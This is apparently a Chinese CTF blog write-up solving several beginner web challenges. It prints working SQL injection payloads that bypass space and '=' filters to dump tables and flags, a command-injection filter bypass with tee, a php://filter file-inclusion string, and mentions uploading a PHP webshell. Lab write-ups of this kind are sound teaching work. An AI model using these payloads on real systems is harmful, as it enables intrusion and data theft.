[SWPUCTF 2021 新生赛]sql
不必多说,sqlmap启动:
我丢,没跑出来表名,那就手注一下试试
这里过滤了空格,但是没有过滤注释,就用/**/替换空格进行orderby操作。
然后发现过滤了等于符号'=' ,于是换成like, 这里我嫌hackbar还要重新编码一次太麻烦了,就直接在url上弄了,这里还要注意换一下前面数字,因为1设置了xxx,yyy固定回显,大概不是这样,不过以后没回显改成2,-1什么的试试多半可以。
CTF系列之Web——联合查询注入_ctf中用户查询-优快云博客
在知道库名下手注爆表
http://127.0.0.1/sqli-labs/Less-1/index.php?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
或则
http://127.0.0.1/sqli-labs/Less-1/index.php?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
此处用:
2'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23
查列同理
这里发现只回显了部分flag,其实经常遇到,位长度问题,这里用mid函数就行 ,其他截断函数,例如substr,right这些都被过滤了。
?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),20,20)/**/from/**/test_db.LTLT_flag%23
改下 ,20,20)这部分就行,mid只能20个长度。
[SWPUCTF 2021 新生赛]finalrce
一眼看到过滤,其实禁用的不是特别多,很多都有平替命令,正好当积累了,这里ls就用到我们上次发的:
可以看到,执行是执行了的,但是你只执行没输出,所以我们需要把执行的内容输出到一个文本里面,再去访问这个文本,这里介绍命令tee
?url=l\s |tee 1.txt
访问可见
这里我也母鸡为什么会有四个,可能是别人传的没清,也有可能是以前做过这道题所以没有新启靶机,是我以前留下的。依次访问发现flag文件名字和flag
这里la被禁止了,我第一时间没看到,处理方式就是加个\转义就行了
[SWPUCTF 2022 新生赛]ez_ez_php
很简单的php
这里截取了file里得是以php开头的三个字符,然后包含了一下file里传入的文件
他的目的大概是让你用伪协议读取读到他的flag文件
还藏了手flag位置
?file=php://filter/resource=flag
[LitCTF 2023]作业管理系统
f12看到弱密码
文件上传题
传个php读一下就行了,注意用蚁剑的时候删一下自己以前的缓存,不然容易弄混。
[UUCTF 2022 新生赛]websign
这就是火狐带给我的自信。
好困,今天做了两套行测题,口算那些计算题真打脑壳,还要看词语排顺序这些,人更昏了。
这里是很菜的WL。
感谢你的收看,希望能够帮到你.
那么我们下一集再见!